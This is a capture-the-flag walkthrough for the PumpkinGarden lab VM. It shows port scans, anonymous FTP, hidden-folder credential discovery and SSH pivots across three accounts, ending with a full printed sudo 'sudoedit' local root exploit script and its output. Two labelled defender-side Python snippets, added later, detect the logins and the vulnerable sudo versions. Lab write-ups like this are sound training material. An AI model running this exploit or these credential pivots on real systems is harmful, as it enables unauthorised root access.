Mission Pumpkin V1 PumpkinGarden
Incomplete notes
Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but are struggling to apply the tools they know. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinGarden is Level 1 of a series of 3 machines under Mission-Pumpkin v1.0. The end goal of this CTF is to gain access to the PumpkinGarden_key file stored in the root account.
1) I download the machine from https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkingarden,321/
2) I import the machine into VirtualBox.
Note: if the machine does not import cleanly, rename the .ova to .ova.tar, extract the hard disk csec-disk001.vmdk, create a new Linux Ubuntu 64-bit virtual machine and attach the extracted disk to it.
3) I boot the machine to be audited in VirtualBox.
Note 2: I configure its network as a host-only adapter.
My VM network is 192.168.56.XX (this may differ on your machine: ip a | grep global).
Then I run nmap -sn 192.168.56.0/24 or nmap -sn 192.168.56.* to see what shows up:
#### Enumeration
The machine's IP is 192.168.56.103. I enumerate ports:
```
em50l@jejo.es$ nmap -F -Pn 192.168.56.103
Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-20 20:08 CEST
Nmap scan report for 192.168.56.103
Host is up (0.00037s latency).
Not shown: 99 closed ports
PORT   STATE SERVICE
21/tcp open  ftp

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
```
Only FTP??? Let me get more details…
```
em50l@jejo.es$ nmap 192.168.56.103 -sC -p 21
Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-20 20:15 CEST
Nmap scan report for 192.168.56.103
Host is up (0.00048s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status

Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds
```
It is an anonymous FTP server, so I can explore it easily. This time I am going to use curl instead of mc.
```
em50l@jejo.es$ curl ftp://192.168.56.103/
-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
em50l@jejo.es$ curl ftp://192.168.56.103/note.txt
Hello Dear!
Looking for route map to PumpkinGarden? I think jack can help you find it.
em50l@jejo.es$
```
If I wanted to see the FTP conversation in detail, I could use the -v option.
```
em50l@jejo.es$ curl -v ftp://192.168.56.103/
*   Trying 192.168.56.103...
* TCP_NODELAY set
* Connected to 192.168.56.103 (192.168.56.103) port 21 (#0)
< 220 Welcome to Pumpkin's FTP service.
> USER anonymous
< 331 Please specify the password.
> PASS ftp@example.com
< 230 Login successful.
> PWD
< 257 "/"
* Entry path is '/'
> EPSV
* Connect data stream passively
< 229 Entering Extended Passive Mode (|||40149|).
*   Trying 192.168.56.103...
* TCP_NODELAY set
* Connecting to 192.168.56.103 (192.168.56.103) port 40149
* ftp_perform ends with SECONDARY: 0
* Connected to 192.168.56.103 (192.168.56.103) port 21 (#0)
> TYPE A
< 200 Switching to ASCII mode.
> LIST
< 150 Here comes the directory listing.
* Maxdownload = -1
-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
* Remembering we are in dir ""
< 226 Directory send OK.
* Connection #0 to host 192.168.56.103 left intact
```
From the above, one user seems to be jack.
- Dictionary attack (does not seem to work).
- I try
mc ftp://jack:PumpkinGarden@192.168.56.103/
(Lucky guess???) I think a wordlist would have to be built from the files pulled from the FTP server.
```
Izquierdo Archivo Utilidades Opciones Derecho
┌<─ ftp://jack@192.168.56.103/ ─.[^]>┐┌─────────────── Información ─────────────┐
│.n Nombre    │Tamaño │fecha Modifi││ Midnight Commander 4.8.19               │
│/..          │DIR-ANT│20 jul 20:05│├─────────────────────────────────────────┤
│/bin         │   4096│11 jun 17:55││ Archivo:   home                         │
│/boot        │   4096│11 jun 17:56││ Ubicado:   0h:23h                       │
│/dev         │   4040│20 jul 14:51││ Modo:      drwxr-xr-x (0755)            │
│/etc         │   4096│20 jul 14:51││ Nº enlaces: 1                           │
│/home        │   4096│11 jun 18:25││ Dueño:     root/root                    │
│/lib         │   4096│11 jun 17:55││ Tamaño:    4096 (8 bloques)             │
│/lib64       │   4096│11 jun 17:51││ Cambiado:  11 jun 18:25                 │
│/lost+found  │  16384│11 jun 17:43││ Modificado: 11 jun 18:25                │
│/media       │   4096│11 jun 17:43││ Accedido:  11 jun 18:25                 │
│/mnt         │   4096│11 abr  2014││ Sistema en /home                        │
│/opt         │   4096│11 jun 17:46││ Origen:    /dev/sda2                    │
│/proc        │      0│20 jul 14:51││ Tipo:      ext4 (802h)                  │
├────────────────────────────────────┤│ Espacio libre: 148G/190G (77%)          │
│/home                               ││ Inodos libres: 12652894/12730368 (99%)  │
└────────────────────────────────────┘└─────────────────────────────────────────┘
Consejo: Con Alt-! puede ejecutar programas y ver la salida en el visor.
em50l@jejo.es$ [^]
 1Ayuda  2Menú   3Ver    4Editar 5Copiar 6RenMov 7Mkdir  8Borrar 9Menú  10Salir
```
I see the following users in home: goblin, jack and scarecrow, and inside jack's folder there is a note:
Are you here for keys to pumpkin garden?
I'm afraid that scarecrow has just stolen the keys from me...
Days later ;)
I think more ports need to be scanned.
```
em50l@jejo.es:~$ nmap -p1-65534 -n -A 192.168.56.103
Starting Nmap 7.60 ( https://nmap.org ) at 2019-08-01 02:06 CEST
Nmap scan report for 192.168.56.103
Host is up (0.0083s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
1515/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Mission-Pumpkin
3535/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d8:8d:e7:48:3a:3c:91:0e:3f:43:ea:a3:05:d8:89:e2 (DSA)
|   2048 f0:41:8f:e0:40:e3:c0:3a:1f:4d:4f:93:e6:63:24:9e (RSA)
|   256 fa:87:57:1b:a2:ba:92:76:0c:e7:85:e7:f5:3d:54:b1 (ECDSA)
|_  256 fa:e8:42:5a:88:91:b4:4b:eb:e4:c3:74:2e:23:a5:45 (EdDSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.65 seconds
```
I see an Apache on port 1515 and an SSH server on port 3535.
I try SSH with the FTP user and password (password reuse):
```
em50l@jejo.es$ sshpass -p 'PumpkinGarden' ssh jack@192.168.56.101 -p 3535
Warning: Permanently added '[192.168.56.101]:3535' (ECDSA) to the list of known hosts.
------------------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
Last login: Sun Aug 25 18:20:43 2019 from 192.168.56.1
jack@Pumpkin:~$ # !!!User-level access obtained!!! We continue in the Privilege escalation section
```
Now I need a privilege escalation.
I browse the file tree over SSH to see what I can find.
```
em50l@jejo.es$ mc sh://jack@192.168.56.101:3535
No protocol specified
fish: Esperando línea de inicio...
jack@192.168.56.101's password:
```
#### HTTP enumeration
```
msf5 > use auxiliary/scanner/http/dir_scanner
msf5 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/http/dir_scanner) > set rport 1515
msf5 auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.56.101
[+] Found http://192.168.56.101:1515/icons/ 403 (192.168.56.101)
[+] Found http://192.168.56.101:1515/img/ 200 (192.168.56.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Good, I found icons and img.
I try it another way:
```
msf5 > use auxiliary/scanner/http/brute_dirs
msf5 auxiliary(scanner/http/brute_dirs) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/http/brute_dirs) > set rport 1515
msf5 auxiliary(scanner/http/brute_dirs) > run

[*] Using code '404' as not found.
[+] Found http://192.168.56.101:1515/img/ 200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
dir_listing gives no results:
```
msf5 > use auxiliary/scanner/http/dir_listing
msf5 auxiliary(scanner/http/dir_listing) > set rport 1515
msf5 auxiliary(scanner/http/dir_listing) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/http/dir_listing) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
msf5 > use auxiliary/scanner/http/files_dir
msf5 auxiliary(scanner/http/files_dir) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/http/files_dir) > set rport 1515
msf5 auxiliary(scanner/http/files_dir) > run

[*] Using code '404' as not found for files with extension .bak
[*] Using code '404' as not found for files with extension .exe
[*] Using code '404' as not found for files with extension .html
[+] Found http://192.168.56.101:1515/index.html 200
...
[*] Using code '404' as not found for files with extension
[+] Found http://192.168.56.101:1515/img 301
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Poking around, I find:
```
em50l@jejo.es$ curl http://192.168.56.101:1515/img/hidden_secret/clue.txt
c2NhcmVjcm93IDogNVFuQCR5
```
base64???
```
em50l@jejo.es$ curl http://192.168.56.101:1515/img/hidden_secret/clue.txt |base64 --decode
scarecrow : 5Qn@$y
```
It looks like a username and password.
```
em50l@jejo.es$ sshpass -p '5Qn@$y' ssh scarecrow@192.168.56.101 -p 3535
Warning: Permanently added '[192.168.56.101]:3535' (ECDSA) to the list of known hosts.
------------------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
Last login: Thu Jun 13 00:35:51 2019 from 192.168.1.106
scarecrow@Pumpkin:~$ # !!!User-level access obtained!!! We continue in the Privilege escalation section
```
```
scarecrow@Pumpkin:~$ ls
note.txt
scarecrow@Pumpkin:~$ cat note.txt
Oops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)!
Reach out to goblin and share this "Y0n$M4sy3D1t" to secretly get keys from LordPumpkin.
```
```
em50l@jejo.es$ sshpass -p 'Y0n$M4sy3D1t' ssh goblin@192.168.56.101 -p 3535
Warning: Permanently added '[192.168.56.101]:3535' (ECDSA) to the list of known hosts.
------------------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
Last login: Thu Jun 13 00:43:14 2019 from 192.168.1.106
goblin@Pumpkin:~$ ls
note
goblin@Pumpkin:~$ cat note
Hello Friend! I heard that you are looking for PumpkinGarden key.
But Key to the garden will be with LordPumpkin(ROOT user), don't worry, I know where LordPumpkin had placed the Key.
You can reach there through my backyard.
Here is the key to my backyard
https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh
goblin@Pumpkin:~$
```
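The login banner says every remote connection is monitored, and what the logs would actually record for the steps above is one source address authenticating over SSH as jack, then scarecrow, then goblin within minutes. As an added defender-side example (not part of the original write-up), this Python script runs that detection over constructed auth.log lines in OpenSSH's format; the host name, PIDs, ports and timestamps are assumed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log lines modelled on the three logins in the write-up
# (jack, scarecrow, goblin, all from the same source host 192.168.56.1).
SAMPLE_LOG = """\
Aug 25 18:20:43 Pumpkin sshd[1401]: Accepted password for jack from 192.168.56.1 port 50122 ssh2
Aug 25 18:22:10 Pumpkin sshd[1422]: Failed password for jack from 192.168.56.1 port 50130 ssh2
Aug 25 18:31:05 Pumpkin sshd[1460]: Accepted password for scarecrow from 192.168.56.1 port 50211 ssh2
Aug 25 18:34:51 Pumpkin sshd[1498]: Accepted password for goblin from 192.168.56.1 port 50240 ssh2
Aug 25 19:10:00 Pumpkin sshd[1533]: Accepted publickey for admin from 10.0.0.5 port 40001 ssh2
"""

ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<src>\S+) port \d+ ssh2"
)

def parse_accepted(log_text, year=2019):
    """Yield (timestamp, user, method, source) for each successful login."""
    for line in log_text.splitlines():
        m = ACCEPTED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["method"], m["src"]

def find_account_hopping(log_text, window_minutes=30, min_users=3):
    """Return {source: [users]} for every source that logged in as at least
    min_users distinct accounts inside a sliding window of window_minutes."""
    by_src = defaultdict(list)
    for ts, user, _method, src in parse_accepted(log_text):
        by_src[src].append((ts, user))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _user) in enumerate(events):
            users = []
            for ts, user in events[i:]:
                if (ts - start).total_seconds() > window_minutes * 60:
                    break
                if user not in users:
                    users.append(user)
            if len(users) >= min_users:
                hits[src] = users
                break
    return hits
```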
The exploit code it points to is this:
```sh
#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh <file you have permission to edit>"
exit
fi
cd /tmp
# The wrapper is written to the current directory under the name of sudo's
# built-in "sudoedit" pseudo-command; the affected sudo versions match that
# file name against a sudoers entry for sudoedit and run it as root.
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1
```
```
goblin@Pumpkin:~$ cat > sudoedit << _EOF
> #!/bin/sh
> echo ALEX-ALEX
> su
> /bin/su
> /usr/bin/su
> _EOF
goblin@Pumpkin:~$ chmod a+x ./sudoedit
goblin@Pumpkin:~$ sudo ./sudoedit $1
[sudo] password for goblin:
Sorry, try again.
[sudo] password for goblin:
ALEX-ALEX
root@Pumpkin:/home/goblin# cd
root@Pumpkin:~# cat PumpkinGarden_Key
Q29uZ3JhdHVsYXRpb25zIQ==
```
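An added defender-side check, not part of the write-up or of the exploit: the script's header states the affected sudo ranges (1.6.x before 1.6.9p21, 1.7.x before 1.7.2p4), so a version string from sudo -V can be tested against them, and the wrapper the script drops as /tmp/sudoedit (the transcript shows it in goblin's home) can be searched for on disk. demo() builds a constructed temporary directory; on a real host the roots /tmp and /home are assumed.

```python
import os
import re
import stat
import tempfile

def parse_sudo_version(text):
    """Turn 'Sudo version 1.7.2p4' (or a bare '1.6.9p21') into a comparable
    tuple; a release with no 'pN' patch level sorts before its p1."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?(?:p(\d+))?", text)
    if not m:
        raise ValueError(f"no sudo version found in {text!r}")
    return tuple(int(x) if x else 0 for x in m.groups())

# First fixed release per branch, as stated in the exploit header:
# 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 are affected.
FIXED = {(1, 6): (1, 6, 9, 21), (1, 7): (1, 7, 2, 4)}

def is_sudo_affected(sudo_v_output):
    """True if the 'sudo -V' output names a version inside the affected ranges."""
    v = parse_sudo_version(sudo_v_output)
    fixed = FIXED.get(v[:2])
    return fixed is not None and v < fixed

def find_rogue_sudoedit(roots):
    """Return executable files named 'sudoedit' under the given directories:
    the artefact the script leaves in /tmp (or in the user's home)."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            if "sudoedit" in files:
                path = os.path.join(dirpath, "sudoedit")
                if os.access(path, os.X_OK):
                    hits.append(path)
    return hits

def demo():
    """Constructed scenario: a fake /tmp holding an executable 'sudoedit'
    wrapper next to an unrelated file, then scanned with find_rogue_sudoedit."""
    with tempfile.TemporaryDirectory() as tmp:
        wrapper = os.path.join(tmp, "sudoedit")
        with open(wrapper, "w") as f:
            f.write("#!/bin/sh\necho wrapper\n")
        os.chmod(wrapper, os.stat(wrapper).st_mode | stat.S_IXUSR)
        with open(os.path.join(tmp, "notes.txt"), "w") as f:
            f.write("not a wrapper\n")
        return [os.path.relpath(p, tmp) for p in find_rogue_sudoedit([tmp])]
```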